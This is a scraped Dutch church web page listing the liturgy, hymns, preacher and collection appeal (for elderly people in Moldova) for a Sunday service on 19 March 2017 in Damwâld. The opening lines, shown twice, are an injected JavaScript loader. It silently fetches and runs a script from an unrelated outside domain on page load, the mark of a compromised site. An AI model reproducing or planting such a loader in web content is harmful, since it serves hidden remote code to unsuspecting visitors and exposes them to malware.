;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 19 maart 2017 9:30 uur - PKN Damwâld
zondag 19 maart 2017
09:30 uur

Kerkdienst zondag 19 maart 2017 9:30 uur

Thema: “Over de rand”

Informatie

Voorganger:Ds. G. Timmer
Organist:Nienke van der Heide-Visser
Thema:“Over de rand”
Liturgie
Lied voor de dienst ELB 374: 1, 2 en 3
Woord van welkom
Intochtslied : Psalm 42: 1, 2 en 3
Stil gebed, bemoediging en groet
We zingen: Gezang 181: 1, 2 en 3
Wetlezing
We zingen: Gezang 181: 4, 5 en 6
Gebed om de opening van het Woord
We lezen: Mattheus 26: 69 t/m 27: 10
We zingen: Psalm 22: 1, 4 en 8
Verkondiging : “Over de rand”
We zingen: Gezang 442: 1, 2, 3 en 4
Dankgebed en voorbeden
Collecte
Slotlied : ELB 501: 1, 2 en 3
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Steun ouderen in Moldavië

40 Dagentijd: Steun ouderen in Moldavië
In Moldavië wonen veel ouderen in zwaar verwaarloosde huizen zonder sanitaire voorzieningen en zonder aansluiting op de waterleiding. Met een pensioen van nog geen twintig euro per maand kunnen zij de minimale maandelijkse lasten, zoals verwarming en medicijnen, niet betalen. Daarnaast leven zij vaak in een sociaal isolement. De Bethania Christian Relief Association (Bethania), partner van Kerk in Actie, zet zich in om het leven van ouderen in Moldavië te verbeteren. Zo realiseerde zij een dagcentrum voor ouderen. Daar ontmoeten ouderen elkaar, nemen deel aan diverse activiteiten en volgen bijbelstudies. Zo hebben de ouderen een plek waar ze samenkomen om iets te ondernemen. Voor ouderen die niet naar het centrum kunnen komen, heeft Bethania een ‘tafeltje-dekje’ service. Op die manier krijgen zij een gezonde en voedzame maaltijd thuis en voelen zich minder eenzaam door dit dagelijkse bezoek. Voor 10 euro kan één oudere dertien keer een maaltijd eten in het dagcentrum of via de 'tafeltje-dekje' service. Uw gift maakt het mogelijk dat deze ouderen zich minder eenzaam voelen, een gezonde en voedzame maaltijd kunnen eten en de zorg krijgen die zij nodig hebben. Doet u ook mee?

Tweede collecte: Kerk
Uitganscollecte: Bouwfonds